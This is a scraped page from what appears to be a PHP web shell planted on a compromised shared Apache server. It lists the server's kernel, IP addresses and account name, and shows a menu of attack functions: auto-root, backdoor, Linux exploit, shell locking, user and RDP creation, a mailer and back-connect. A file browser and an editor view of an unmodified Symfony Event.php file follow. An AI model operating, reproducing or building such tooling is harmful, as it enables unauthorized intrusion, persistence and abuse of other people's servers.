Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
symfony /
event-dispatcher /
[ HOME SHELL ]
Name
Size
Permission
Action
Debug
[ DIR ]
drwxr-xr-x
DependencyInjection
[ DIR ]
drwxr-xr-x
Tests
[ DIR ]
drwxr-xr-x
CHANGELOG.md
1.25
KB
-rw-r--r--
ContainerAwareEventDispatcher....
7.03
KB
-rw-r--r--
Event.php
1.59
KB
-rw-r--r--
EventDispatcher.php
7.02
KB
-rw-r--r--
EventDispatcherInterface.php
3.09
KB
-rw-r--r--
EventSubscriberInterface.php
1.68
KB
-rw-r--r--
GenericEvent.php
3.61
KB
-rw-r--r--
ImmutableEventDispatcher.php
2.12
KB
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
README.md
604
B
-rw-r--r--
composer.json
1.14
KB
-rw-r--r--
phpunit.xml.dist
893
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Event.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\EventDispatcher; /** * Event is the base class for classes containing event data. * * This class contains no event data. It is used by events that do not pass * state information to an event handler when an event is raised. * * You can call the method stopPropagation() to abort the execution of * further listeners in your event listener. * * @author Guilherme Blanco <guilhermeblanco@hotmail.com> * @author Jonathan Wage <jonwage@gmail.com> * @author Roman Borschel <roman@code-factory.org> * @author Bernhard Schussek <bschussek@gmail.com> */ class Event { /** * @var bool Whether no further event listeners should be triggered */ private $propagationStopped = false; /** * Returns whether further event listeners should be triggered. * * @see Event::stopPropagation() * * @return bool Whether propagation was already stopped for this event */ public function isPropagationStopped() { return $this->propagationStopped; } /** * Stops the propagation of the event to further event listeners. * * If multiple event listeners are connected to the same event, no * further event listener will be triggered once any trigger calls * stopPropagation(). */ public function stopPropagation() { $this->propagationStopped = true; } }
Close